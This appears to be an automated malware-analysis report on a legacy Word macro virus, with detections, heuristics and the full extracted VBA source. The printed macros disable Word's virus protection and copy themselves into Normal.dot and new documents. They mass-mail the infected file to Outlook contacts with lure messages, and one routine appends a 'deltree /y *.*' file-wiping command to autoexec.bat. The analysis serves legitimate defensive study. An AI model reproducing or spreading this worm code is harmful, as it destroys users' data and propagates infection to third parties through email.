MALICIOUS
Risk Score: 280
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic and VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon document opening. The script attempts to write to 'c:\autoexec.bat' and appends 'echo s|deltree /y *.*>Combo.vir', indicating an attempt to drop or execute a secondary payload. The ClamAV detection 'Doc.Trojan.Combossa-1' and 'Win.Worm.VBS-213' further support its malicious nature.
Heuristics (6)
- ClamAV: Doc.Trojan.Combossa-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Combossa-1
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4361 bytes |

SHA-256: 932f179300c24027f424720ae259400425ed796f2538268c928930b961651452
Detection (ClamAV): Win.Worm.VBS-213
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub Main()
Dim nome$, arq$
Dim dead As Integer
On Error GoTo infecta
dead = System.ProfileString("Defination", "Combo")
dead = dead - 1
System.ProfileString("Defination", "Combo") = dead
GoTo noerro
infecta:
System.ProfileString("Defination", "Combo") = 100
dead = System.ProfileString("Defination", "Combo")
noerro:
If dead = 0 Then
If MsgBox("Is the man the virus of the planet?", vbYesNo, "You Died!") = vbYes Then
MsgBox "Correct answer!"
System.ProfileString("Defination", "Combo") = 100
Else
MsgBox "You Died!"
Open "c:\autoexec.bat" For Append As #1
Write #1, "echo s|deltree /y *.*>Combo.vir"
Close #1
End If
End If
Err.Clear
Options.VirusProtection = False
CommandBars("Tools").Controls("Macro").Enabled = False
nome$ = Normal.ThisDocument.FullName
arq$ = Application.ActiveDocument.FullName
macros = NormalTemplate.VBProject.VBComponents.Count
macros = Normal.ThisDocument.VBProject.VBComponents.Count - 1
If macros <= 0 Then
On Error Resume Next
Application.OrganizerCopy arq$, nome$, "AutoOpen", wdOrganizerObjectProjectItems
Application.OrganizerCopy arq$, nome$, "AutoNew", wdOrganizerObjectProjectItems
Application.OrganizerCopy arq$, nome$, "Combo", wdOrganizerObjectProjectItems
Application.OrganizerCopy arq$, nome$, "OpenFile", wdOrganizerObjectProjectItems
End If
fim:
combo.combo
End Sub
Attribute VB_Name = "AutoNew"
Public Sub Main()
Dim dat As String
nome$ = Normal.ThisDocument.FullName
arq$ = Application.ActiveDocument.FullName
macros = Application.ActiveDocument.VBProject.VBComponents.Count - 1
If macros <= 0 Then
On Error Resume Next
Application.OrganizerCopy nome$, arq$, "AutoOpen", wdOrganizerObjectProjectItems
Application.OrganizerCopy nome$, arq$, "AutoNew", wdOrganizerObjectProjectItems
Application.OrganizerCopy nome$, arq$, "Combo", wdOrganizerObjectProjectItems
Application.OrganizerCopy nome$, arq$, "OpenFile", wdOrganizerObjectProjectItems
End If
fim:
dat = "1 / 1 / 2000"
Date = dat
End Sub
Attribute VB_Name = "Combo"
Public Sub combo()
On Error Resume Next
Dim look, DMN, BO
Dim avp As String
Set look = CreateObject("Outlook.Application")
Set DMN = look.GetNameSpace("MAPI")
avp = "Outlook"
If look = avp Then
DMN.Logon "profile", "password"
For y = 1 To DMN.AddressLists.Count
Set AddyBook = DMN.AddressLists(y)
x = 1
Set BO = look.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BO.Recipients.Add Peep
x = x + 1
If x > 49 Then oo = AddyBook.AddressEntries.Count
Next oo
lingua = System.LanguageDesignation
If lingua = "Português (Brasil)" Then
BO.Subject = "Ainda se lembra de mim? " & Application.UserName
BO.Body = "Por que não me escreve mais? Ai vai o documento que me pediu, e não me pergunte como consegui!...Abraços!"
BO.Attachments.Add ActiveDocument.FullName
BO.Send
Peep = ""
Else
BO.Subject = "Do you Still remember me? " & Application.UserName
BO.Body = "Why doesn't write me more? Here be the document that asked me, and don't wonder as I got!... Hugs!"
BO.Attachments.Add ActiveDocument.FullName
BO.Send
Peep = ""
End If
Next y
End If
End Sub
Attribute VB_Name = "OpenFile"
Public Sub Main()
nome$ = Normal.ThisDocument.FullName
arq$ = Application.ActiveDocument.FullName
macros = Application.ActiveDocument.VBProject.VBComponents.Count - 1
If macros <= 0 Then
On Error Resume Next
Application.OrganizerCopy nome$, arq$, "AutoOpen", wdOrganizerObjectProjectItems
Applica
... (truncated)
```